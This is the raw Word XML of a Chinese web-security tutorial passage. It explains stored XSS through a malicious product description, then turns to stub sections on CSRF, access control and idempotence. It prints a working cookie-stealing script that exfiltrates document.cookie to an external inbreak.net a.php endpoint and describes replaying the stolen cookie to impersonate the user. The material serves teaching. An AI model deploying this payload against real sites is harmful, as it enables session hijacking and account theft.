          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者发布产品后，等待用户来浏览产品列表页面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个用户浏览了页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3308B1" wp14:editId="4CE15C5F">
            <wp:extent cx="4038600" cy="3038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3038475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面中直接显示了攻击者当时提交的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pdesc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的内容，也就是恶意脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将执行</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://inbreak.net/a.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本内容：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0150E5" w:rsidTr="00E72C47">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="00E72C47">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>a=document.createElement("iframe");function b(){e=escape(document.cookie);c=["</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>http://www.inbreak.net/kxlzxtest/testxss/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.php?cookie=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>",e,Math.random()];document.body.appendChild(a);a.src=c.join();}setTimeout('b()',5000);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前浏览者的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并发送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个文件负责接收到用户发来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并保存为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>haha.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。这时，用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经发送到了攻击者的服务器上，攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可以打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>haha.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA17BE7" wp14:editId="5A1B537D">
            <wp:extent cx="4124325" cy="885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885825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000150E5" w:rsidRDefault="000150E5" w:rsidP="000150E5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是刚才那个用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者可以使用浏览器插件，把自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换成刚刚窃取用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。之后攻击者再次访问服务器时，服务器应用程序，就认为攻击者的身份是刚刚那个用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5259" w:rsidRPr="000150E5" w:rsidRDefault="000D5259" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00597A91" w:rsidRDefault="00597A91" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00597A91" w:rsidRDefault="00D54369" w:rsidP="00597A91">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决</w:t>
      </w:r>
      <w:r>
        <w:t>方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00597A91" w:rsidRDefault="00597A91" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00597A91" w:rsidRDefault="00597A91" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00597A91" w:rsidRPr="00C26930" w:rsidRDefault="00597A91" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00153008" w:rsidRPr="00C26930" w:rsidRDefault="008C1A87" w:rsidP="00153008">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Cross-site Request Forgery(CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937182" w:rsidRPr="00937182" w:rsidRDefault="00937182" w:rsidP="00937182">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>威胁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937182" w:rsidRPr="00937182" w:rsidRDefault="00937182" w:rsidP="0074178E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF(Cross-site request forgery)</w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站请求伪造是一类常见编程漏洞。对于存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937182" w:rsidRPr="00C26930" w:rsidRDefault="00937182" w:rsidP="0074178E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站，攻击者可以事先构造好</w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00937182">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要受害者用户一访问，后台便在用户不知情情况下对数据库中用户参数进行相应修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00153008" w:rsidRPr="00C26930" w:rsidRDefault="00153008" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00AA55FF" w:rsidP="00753309">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>业务</w:t>
      </w:r>
      <w:r w:rsidR="00A5489B" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00AA55FF" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00EE0E7B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>访问控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0025043D" w:rsidRPr="00C26930" w:rsidRDefault="0025043D" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00EE0E7B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>纵向访问控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00EE0E7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00EE0E7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B38F8" w:rsidRPr="00C26930" w:rsidRDefault="000B38F8" w:rsidP="000B38F8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>横向访问控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00647D6F" w:rsidRPr="00C26930" w:rsidRDefault="001A36EF" w:rsidP="00647D6F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>防重刷</w:t>
      </w:r>
      <w:r w:rsidR="00647D6F" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0E7B" w:rsidRPr="00C26930" w:rsidRDefault="00EE0E7B" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007751AD" w:rsidRPr="00C26930" w:rsidRDefault="007751AD" w:rsidP="007751AD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>幂等性操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647D6F" w:rsidRPr="00C26930" w:rsidRDefault="00737A75" w:rsidP="00737A75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737A75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口需要确保等幂性</w:t>
      </w:r>
      <w:r w:rsidRPr="00737A75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Idempotence)</w:t>
      </w:r>
      <w:r w:rsidRPr="00737A75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保证多次重复请求只能够执行一次，查询类接口一般不存在幂等性问题。涉及金钱的接口操作申请退款、向银行或者支付宝转账付款、向</w:t>
      </w:r>
      <w:r w:rsidRPr="00737A75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12306</w:t>
      </w:r>
      <w:r w:rsidRPr="00737A75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订票，还比如一些短信发送、投票系统、记账报税操作等。这些数据要确保同一次填写只能保存一条数据记录，因此需要考虑重复提交、防止重复刷新、防止后退问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007751AD" w:rsidRPr="00C26930" w:rsidRDefault="007751AD" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00417599" w:rsidP="00EE0E7B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>线程安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00271055" w:rsidRPr="00C26930" w:rsidRDefault="00271055" w:rsidP="00271055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00271055" w:rsidRPr="00C26930" w:rsidRDefault="00271055" w:rsidP="00271055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00271055" w:rsidRPr="00C26930" w:rsidRDefault="00271055" w:rsidP="00271055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00271055" w:rsidRPr="00C26930" w:rsidRDefault="00271055" w:rsidP="00271055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00271055" w:rsidRPr="00C269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E8C" w:rsidRDefault="00B93E8C" w:rsidP="004153E9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B93E8C" w:rsidRDefault="00B93E8C" w:rsidP="00415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E8C" w:rsidRDefault="00B93E8C" w:rsidP="004153E9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B93E8C" w:rsidRDefault="00B93E8C" w:rsidP="004153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B09EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="299CBD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9EB127C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49EB12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272"/>
    <w:rsid w:val="000150E5"/>
    <w:rsid w:val="000303AB"/>
    <w:rsid w:val="00034280"/>
    <w:rsid w:val="00035E01"/>
    <w:rsid w:val="000568D7"/>
    <w:rsid w:val="00073AE3"/>
    <w:rsid w:val="00080E51"/>
    <w:rsid w:val="00090C65"/>
    <w:rsid w:val="000B38F8"/>
    <w:rsid w:val="000D3D27"/>
    <w:rsid w:val="000D5259"/>
    <w:rsid w:val="00137BA5"/>
    <w:rsid w:val="00153008"/>
    <w:rsid w:val="001A36EF"/>
    <w:rsid w:val="001D05BB"/>
    <w:rsid w:val="00220452"/>
    <w:rsid w:val="00224AE4"/>
    <w:rsid w:val="0025043D"/>
    <w:rsid w:val="00271055"/>
    <w:rsid w:val="002C03D2"/>
    <w:rsid w:val="002C2CA5"/>
    <w:rsid w:val="002D25D9"/>
    <w:rsid w:val="002D50AC"/>
    <w:rsid w:val="0031182E"/>
    <w:rsid w:val="00335F35"/>
    <w:rsid w:val="003671ED"/>
    <w:rsid w:val="003721CD"/>
    <w:rsid w:val="00387CB1"/>
    <w:rsid w:val="00395A44"/>
    <w:rsid w:val="003A7F26"/>
    <w:rsid w:val="003D08F3"/>
    <w:rsid w:val="003D60D9"/>
    <w:rsid w:val="003D69E3"/>
    <w:rsid w:val="003F5D8A"/>
    <w:rsid w:val="004153E9"/>
    <w:rsid w:val="004157FE"/>
    <w:rsid w:val="00417599"/>
    <w:rsid w:val="00420F04"/>
    <w:rsid w:val="004236AD"/>
    <w:rsid w:val="004425E1"/>
    <w:rsid w:val="004544B8"/>
    <w:rsid w:val="004C3EF3"/>
    <w:rsid w:val="004C74FD"/>
    <w:rsid w:val="004F1F47"/>
    <w:rsid w:val="005114F6"/>
    <w:rsid w:val="005236B6"/>
    <w:rsid w:val="00534D2A"/>
    <w:rsid w:val="00542886"/>
    <w:rsid w:val="00555071"/>
    <w:rsid w:val="00591E64"/>
    <w:rsid w:val="00597A91"/>
    <w:rsid w:val="005F6C56"/>
    <w:rsid w:val="00647D6F"/>
    <w:rsid w:val="00657A62"/>
    <w:rsid w:val="00667207"/>
    <w:rsid w:val="006804EA"/>
    <w:rsid w:val="00684BA5"/>
    <w:rsid w:val="00696419"/>
    <w:rsid w:val="006A4566"/>
    <w:rsid w:val="006C3319"/>
    <w:rsid w:val="006D16B2"/>
    <w:rsid w:val="006E6798"/>
    <w:rsid w:val="007260E5"/>
    <w:rsid w:val="00726579"/>
    <w:rsid w:val="00737A75"/>
    <w:rsid w:val="0074178E"/>
    <w:rsid w:val="00743524"/>
    <w:rsid w:val="00753309"/>
    <w:rsid w:val="007751AD"/>
    <w:rsid w:val="007F039B"/>
    <w:rsid w:val="00803664"/>
    <w:rsid w:val="00814E3F"/>
    <w:rsid w:val="008446A2"/>
    <w:rsid w:val="008925B1"/>
    <w:rsid w:val="008A2306"/>
    <w:rsid w:val="008C1A87"/>
    <w:rsid w:val="008C4052"/>
    <w:rsid w:val="008C7B59"/>
    <w:rsid w:val="008D3D2D"/>
    <w:rsid w:val="009066BA"/>
    <w:rsid w:val="009125B0"/>
    <w:rsid w:val="00937182"/>
